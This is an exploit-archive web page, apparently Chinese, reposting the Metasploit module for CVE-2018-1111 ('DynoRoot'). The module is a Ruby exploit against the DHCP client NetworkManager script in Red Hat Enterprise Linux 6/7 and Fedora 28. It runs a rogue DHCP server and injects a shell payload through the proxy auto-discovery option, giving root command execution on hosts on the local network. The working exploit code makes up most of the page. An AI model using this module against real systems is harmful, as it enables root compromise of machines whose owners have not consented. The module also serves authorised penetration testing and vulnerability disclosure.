首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DHCP Client - Command Injection 'DynoRoot' (Metasploit)
来源:metasploit.com 作者:Kirsche 发布时间:2018-06-28  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::DHCPServer
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DHCP Client Command Injection (DynoRoot)',
      'Description'    => %q{
        This module exploits the DynoRoot vulnerability, a flaw in how the
         NetworkManager integration script included in the DHCP client in
         Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
         processes DHCP options. A malicious DHCP server, or an attacker on
         the local network able to spoof DHCP responses, could use this flaw
         to execute arbitrary commands with root privileges on systems using
         NetworkManager and configured to obtain network configuration using
         the DHCP protocol.
      },
      'Author'         =>
        [
          'Felix Wilhelm', # Vulnerability discovery
          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'References'     =>
        [
          ['AKA', 'DynoRoot'],
          ['CVE', '2018-1111'],
          ['EDB': '44652'],
          ['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
          ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
          ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
          ['URL', 'https://dynoroot.ninja/'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
          ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
        ],
      'Targets'        => [ [ 'Automatic Target', { }] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 15 2018'
    ))
 
    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
  end
 
  def exploit
    hash = datastore.copy
    start_service(hash)
    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
 
    begin
      while @dhcp.thread.alive?
        sleep 2
      end
    ensure
      stop_service
    end
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·glibc - 'realpath()' Privilege
·rtorrent 0.9.6 - Denial of Ser
·WebKitGTK+ < 2.21.3 - 'WebKitF
·Gnome Web (Epiphany) Denial Of
·Chrome V8 PromiseAllResolveEle
·Microsoft Windows 10 scrrun.dl
·XiongMai uc-httpd 1.0.0 - Buff
·WebKit - Use-After-Free when R
·Google Chrome - Integer Overfl
·WebKit - WebAssembly Compilati
·TrendMicro OfficeScan XG 11.0
·Apple macOS/iOS Kernel - Heap
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved